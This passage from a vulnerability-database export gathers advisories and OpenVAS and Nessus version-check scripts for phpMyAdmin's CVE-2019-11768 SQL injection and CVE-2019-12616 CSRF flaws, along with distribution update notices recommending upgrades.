Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140207\");\n script_version(\"2019-06-11T04:26:53+0000\");\n script_tag(name:\"last_modification\", value:\"2019-06-11 04:26:53 +0000 (Tue, 11 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-11 04:06:59 +0000 (Tue, 11 Jun 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2019-11768\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"phpMyAdmin < 4.8.6 SQL Injection Vulnerability - PMASA-2019-3 (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to an SQL injection vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A vulnerability was reported where a specially crafted database name can be\n used to trigger an SQL injection attack through the designer feature.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin prior to version 4.8.6.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.8.6 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2019-3/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_is_less(version: version, test_version: \"4.8.6\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.8.6\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-12T20:42:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-11768"], "description": "phpMyAdmin is prone to an SQL injection vulnerability.", "modified": "2019-06-11T00:00:00", "published": "2019-06-11T00:00:00", "id": "OPENVAS:1361412562310142498", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142498", "type": "openvas", "title": "phpMyAdmin < 4.8.6 SQL Injection Vulnerability - PMASA-2019-3 (Windows)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142498\");\n script_version(\"2019-06-11T04:26:53+0000\");\n script_tag(name:\"last_modification\", value:\"2019-06-11 04:26:53 +0000 (Tue, 11 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-11 04:17:06 +0000 (Tue, 11 Jun 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2019-11768\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"phpMyAdmin < 4.8.6 SQL Injection Vulnerability - PMASA-2019-3 (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to an SQL injection vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A vulnerability was reported where a specially crafted database name can be\n used to trigger an SQL injection attack through the designer feature.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin prior to version 4.8.6.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.8.6 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2019-3/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_is_less(version: version, test_version: \"4.8.6\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.8.6\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-13T14:42:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12616"], "description": "phpMyAdmin is prone to a CSRF vulnerability.", "modified": "2019-06-12T00:00:00", "published": "2019-06-11T00:00:00", "id": "OPENVAS:1361412562310142500", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142500", "type": "openvas", "title": "phpMyAdmin < 4.9.0 CSRF Vulnerability - PMASA-2019-4 (Windows)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142500\");\n script_version(\"2019-06-12T17:55:08+0000\");\n script_tag(name:\"last_modification\", value:\"2019-06-12 17:55:08 +0000 (Wed, 12 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-11 04:26:01 +0000 (Tue, 11 Jun 2019)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_cve_id(\"CVE-2019-12616\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"phpMyAdmin < 4.9.0 CSRF Vulnerability - PMASA-2019-4 (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to a CSRF vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A vulnerability was found that allows an attacker to trigger a CSRF attack\n against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at\n the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT\n or DELETE statement) through the victim.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin prior to version 4.9.0.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.9.0 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2019-4/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_is_less(version: version, test_version: \"4.9.0\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.9.0\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-06-12T20:42:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12616"], "description": "phpMyAdmin is prone to a CSRF vulnerability.", "modified": "2019-06-11T00:00:00", "published": "2019-06-11T00:00:00", "id": "OPENVAS:1361412562310142499", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142499", "type": "openvas", "title": "phpMyAdmin < 4.9.0 CSRF Vulnerability - PMASA-2019-4 (Linux)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142499\");\n script_version(\"2019-06-11T04:26:53+0000\");\n script_tag(name:\"last_modification\", value:\"2019-06-11 04:26:53 +0000 (Tue, 11 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-11 04:18:55 +0000 (Tue, 11 Jun 2019)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_cve_id(\"CVE-2019-12616\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"phpMyAdmin < 4.9.0 CSRF Vulnerability - PMASA-2019-4 (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to a CSRF vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A vulnerability was found that allows an attacker to trigger a CSRF attack\n against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at\n the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT\n or DELETE statement) through the victim.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin prior to version 4.9.0.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.9.0 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2019-4/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_is_less(version: version, test_version: \"4.9.0\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.9.0\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-01-29T19:29:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6612", "CVE-2016-6611", "CVE-2016-6630", "CVE-2016-6632", "CVE-2019-12616", "CVE-2016-9850", "CVE-2016-6607", "CVE-2016-6613", "CVE-2016-6606", "CVE-2016-9864", "CVE-2016-6626", "CVE-2016-9861", "CVE-2016-6627", "CVE-2016-9849", "CVE-2016-6628", "CVE-2016-6624", "CVE-2016-6631"], "description": "The remote host is missing an update for the ", "modified": "2020-01-29T00:00:00", "published": "2019-06-18T00:00:00", "id": "OPENVAS:1361412562310891821", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891821", "type": "openvas", "title": "Debian LTS: Security Advisory for phpmyadmin (DLA-1821-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891821\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2016-6606\", \"CVE-2016-6607\", \"CVE-2016-6611\", \"CVE-2016-6612\", \"CVE-2016-6613\", \"CVE-2016-6624\", \"CVE-2016-6626\", \"CVE-2016-6627\", \"CVE-2016-6628\", \"CVE-2016-6630\", \"CVE-2016-6631\", \"CVE-2016-6632\", \"CVE-2016-9849\", \"CVE-2016-9850\", \"CVE-2016-9861\", \"CVE-2016-9864\", \"CVE-2019-12616\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-06-18 02:00:39 +0000 (Tue, 18 Jun 2019)\");\n script_name(\"Debian LTS: Security Advisory for phpmyadmin (DLA-1821-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/06/msg00009.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1821-1\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/930017\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpmyadmin'\n package(s) announced via the DLA-1821-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple security vulnerabilities were fixed in phpmyadmin, a MySQL web\nadministration tool, which prevent possible SQL injection attacks, CSRF,\nthe bypass of user restrictions, information disclosure or\ndenial-of-service.\");\n\n script_tag(name:\"affected\", value:\"'phpmyadmin' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n4:4.2.12-2+deb8u6.\n\nWe recommend that you upgrade your phpmyadmin packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"phpmyadmin\", ver:\"4:4.2.12-2+deb8u6\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-11768", "CVE-2019-12616"], "description": "A validating SQL lexer and parser with a focus on MySQL dialect. This library was originally developed for phpMyAdmin during the Google Summer of Code 2015. Autoloader: /usr/share/php/PhpMyAdmin/SqlParser/autoload.php ", "modified": "2019-06-14T00:55:18", "published": "2019-06-14T00:55:18", "id": "FEDORA:51FCE606181A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: php-phpmyadmin-sql-parser-4.3.2-1.fc30", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-11768", "CVE-2019-12616"], "description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the World Wide Web. Most frequently used operations are supported by the user interface (managing databases, tables, fields, relations, index es, users, permissions), while you still have the ability to directly execute a ny SQL statement. Features include an intuitive web interface, support for most MySQL features (browse and drop databases, tables, views, fields and indexes, create, copy, drop, rename and alter databases, tables, fields and indexes, maintenance server, databases and tables, with proposals on server configuration, execu te, edit and bookmark any SQL-statement, even batch-queries, manage MySQL users and privileges, manage stored procedures and triggers), import data from CSV and SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument T ext and Spreadsheet, Word, Excel, LATEX and others, administering multiple serv ers, creating PDF graphics of your database layout, creating complex queries usi ng Query-by-example (QBE), searching globally in a database or a subset of it, transforming stored data into any format using a set of predefined function s, like displaying BLOB-data as image or download-link and much more... ", "modified": "2019-06-14T02:17:13", "published": "2019-06-14T02:17:13", "id": "FEDORA:4E499617F90B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: phpMyAdmin-4.9.0.1-1.fc29", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-11768", "CVE-2019-12616"], "description": "A validating SQL lexer and parser with a focus on MySQL dialect. This library was originally developed for phpMyAdmin during the Google Summer of Code 2015. Autoloader: /usr/share/php/PhpMyAdmin/SqlParser/autoload.php ", "modified": "2019-06-14T02:17:13", "published": "2019-06-14T02:17:13", "id": "FEDORA:8B6C26179A0D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: php-phpmyadmin-sql-parser-4.3.2-1.fc29", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "typo3": [{"lastseen": "2020-11-12T01:21:26", "bulletinFamily": "software", "cvelist": ["CVE-2019-11768", "CVE-2019-12616"], "description": "Multiple vulnerabilities have been found in the phpMyAdmin component.\n", "modified": "2019-06-25T00:00:00", "published": "2019-06-25T00:00:00", "id": "TYPO3-EXT-SA-2019-014", "href": "https://typo3.org/security/advisory/typo3-ext-sa-2019-014", "type": "typo3", "title": "Multiple vulnerabilities in extension \"phpMyAdmin\" (phpmyadmin)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2019-08-14T10:32:06", "bulletinFamily": "unix", "cvelist": ["CVE-2019-12616", "CVE-2019-11768"], "description": "This update for phpMyAdmin fixes the following issues:\n\n phpMyAdmin was updated to 4.9.0.1:\n\n * Several issues with SYSTEM VERSIONING tables\n * Fixed json encode error in export\n * Fixed JavaScript events not activating on input (sql bookmark issue)\n * Show Designer combo boxes when adding a constraint\n * Fix edit view\n * Fixed invalid default value for bit field\n * Fix several errors relating to GIS data types\n * Fixed javascript error PMA_messages is not defined\n * Fixed import XML data with leading zeros\n * Fixed php notice, added support for 'DELETE HISTORY' table privilege\n (MariaDB &gt;= 10.3.4)\n * Fixed MySQL 8.0.0 issues with GIS display\n * Fixed &quot;Server charset&quot; in &quot;Database server&quot; tab showing wrong information\n * Fixed can not copy user on Percona Server 5.7\n * Updated sql-parser to version 4.3.2, which fixes several parsing and\n linting problems\n\n - boo#1137497 / PMASA-2019-4 / CVE-2019-12616 / CWE-661: Fixed CSRF\n vulnerability in login form\n <a rel=\"nofollow\" href=\"https://www.phpmyadmin.net/security/PMASA-2019-4/\">https://www.phpmyadmin.net/security/PMASA-2019-4/</a>\n\n - boo#1137496 / PMASA-2019-3 / CVE-2019-11768 / CWE-661: Fixed SQL\n injection in Designer feature\n <a rel=\"nofollow\" href=\"https://www.phpmyadmin.net/security/PMASA-2019-3/\">https://www.phpmyadmin.net/security/PMASA-2019-3/</a>\n\n\n This update was imported from the openSUSE:Leap:15.0:Update update project.\n\n", "edition": 1, "modified": "2019-08-14T09:10:32", "published": "2019-08-14T09:10:32", "id": "OPENSUSE-SU-2019:1861-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00017.html", "title": "Security update for phpMyAdmin (moderate)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-02T17:24:43", "bulletinFamily": "unix", "cvelist": ["CVE-2019-12616", "CVE-2019-11768"], "description": "This update for phpMyAdmin fixes the following issues:\n\n phpMyAdmin was updated to 4.9.0.1:\n\n * Several issues with SYSTEM VERSIONING tables\n * Fixed json encode error in export\n * Fixed JavaScript events not activating on input (sql bookmark issue)\n * Show Designer combo boxes when adding a constraint\n * Fix edit view\n * Fixed invalid default value for bit field\n * Fix several errors relating to GIS data types\n * Fixed javascript error PMA_messages is not defined\n * Fixed import XML data with leading zeros\n * Fixed php notice, added support for 'DELETE HISTORY' table privilege\n (MariaDB &gt;= 10.3.4)\n * Fixed MySQL 8.0.0 issues with GIS display\n * Fixed &quot;Server charset&quot; in &quot;Database server&quot; tab showing wrong information\n * Fixed can not copy user on Percona Server 5.7\n * Updated sql-parser to version 4.3.2, which fixes several parsing and\n linting problems\n\n - boo#1137497 / PMASA-2019-4 / CVE-2019-12616 / CWE-661: Fixed CSRF\n vulnerability in login form\n <a rel=\"nofollow\" href=\"https://www.phpmyadmin.net/security/PMASA-2019-4/\">https://www.phpmyadmin.net/security/PMASA-2019-4/</a>\n\n - boo#1137496 / PMASA-2019-3 / CVE-2019-11768 / CWE-661: Fixed SQL\n injection in Designer feature\n <a rel=\"nofollow\" href=\"https://www.phpmyadmin.net/security/PMASA-2019-3/\">https://www.phpmyadmin.net/security/PMASA-2019-3/</a>\n\n", "edition": 1, "modified": "2019-07-02T12:13:18", "published": "2019-07-02T12:13:18", "id": "OPENSUSE-SU-2019:1689-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00005.html", "title": "Security update for phpMyAdmin (moderate)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-09-24T09:07:42", "description": "This update for phpMyAdmin fixes the following issues :\n\nphpMyAdmin was updated to 4.9.0.1 :\n\n - Several issues with SYSTEM VERSIONING tables\n\n - Fixed json encode error in export\n\n - Fixed JavaScript events not activating on input (sql\n bookmark issue)\n\n - Show Designer combo boxes when adding a constraint\n\n - Fix edit view\n\n - Fixed invalid default value for bit field\n\n - Fix several errors relating to GIS data types\n\n - Fixed JavaScript error PMA_messages is not defined\n\n - Fixed import XML data with leading zeros\n\n - Fixed php notice, added support for 'DELETE HISTORY'\n table privilege (MariaDB >= 10.3.4)\n\n - Fixed MySQL 8.0.0 issues with GIS display\n\n - Fixed 'Server charset' in 'Database server' tab showing\n wrong information\n\n - Fixed can not copy user on Percona Server 5.7\n\n - Updated sql-parser to version 4.3.2, which fixes several\n parsing and linting problems\n\n - boo#1137497 / PMASA-2019-4 / CVE-2019-12616 / CWE-661:\n Fixed CSRF vulnerability in login form\n https://www.phpmyadmin.net/security/PMASA-2019-4/\n\n - boo#1137496 / PMASA-2019-3 / CVE-2019-11768 / CWE-661:\n Fixed SQL injection in Designer feature\n https://www.phpmyadmin.net/security/PMASA-2019-3/", "edition": 14, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-07-05T00:00:00", "title": "openSUSE Security Update : phpMyAdmin (openSUSE-2019-1689)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12616", "CVE-2019-11768"], "modified": "2019-07-05T00:00:00", "cpe": ["cpe:/o:novell:opensuse:15.1", "p-cpe:/a:novell:opensuse:phpMyAdmin"], "id": "OPENSUSE-2019-1689.NASL", "href": "https://www.tenable.com/plugins/nessus/126490", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-1689.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126490);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/23\");\n\n script_cve_id(\"CVE-2019-11768\", \"CVE-2019-12616\");\n\n script_name(english:\"openSUSE Security Update : phpMyAdmin (openSUSE-2019-1689)\");\n script_summary(english:\"Check for the openSUSE-2019-1689 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for phpMyAdmin fixes the following issues :\n\nphpMyAdmin was updated to 4.9.0.1 :\n\n - Several issues with SYSTEM VERSIONING tables\n\n - Fixed json encode error in export\n\n - Fixed JavaScript events not activating on input (sql\n bookmark issue)\n\n - Show Designer combo boxes when adding a constraint\n\n - Fix edit view\n\n - Fixed invalid default value for bit field\n\n - Fix several errors relating to GIS data types\n\n - Fixed JavaScript error PMA_messages is not defined\n\n - Fixed import XML data with leading zeros\n\n - Fixed php notice, added support for 'DELETE HISTORY'\n table privilege (MariaDB >= 10.3.4)\n\n - Fixed MySQL 8.0.0 issues with GIS display\n\n - Fixed 'Server charset' in 'Database server' tab showing\n wrong information\n\n - Fixed can not copy user on Percona Server 5.7\n\n - Updated sql-parser to version 4.3.2, which fixes several\n parsing and linting problems\n\n - boo#1137497 / PMASA-2019-4 / CVE-2019-12616 / CWE-661:\n Fixed CSRF vulnerability in login form\n https://www.phpmyadmin.net/security/PMASA-2019-4/\n\n - boo#1137496 / PMASA-2019-3 / CVE-2019-11768 / CWE-661:\n Fixed SQL injection in Designer feature\n https://www.phpmyadmin.net/security/PMASA-2019-3/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1137496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1137497\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2019-3/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2019-4/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 